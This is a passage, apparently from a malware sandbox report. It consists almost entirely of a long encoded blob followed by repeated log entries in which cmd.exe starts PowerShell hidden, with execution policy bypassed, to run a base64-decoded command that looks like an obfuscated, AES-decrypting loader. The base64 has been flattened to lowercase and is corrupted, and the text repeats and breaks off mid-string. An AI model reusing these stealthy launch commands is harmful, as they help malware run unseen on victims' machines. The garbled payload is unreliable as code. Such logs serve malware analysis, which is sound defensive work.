vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz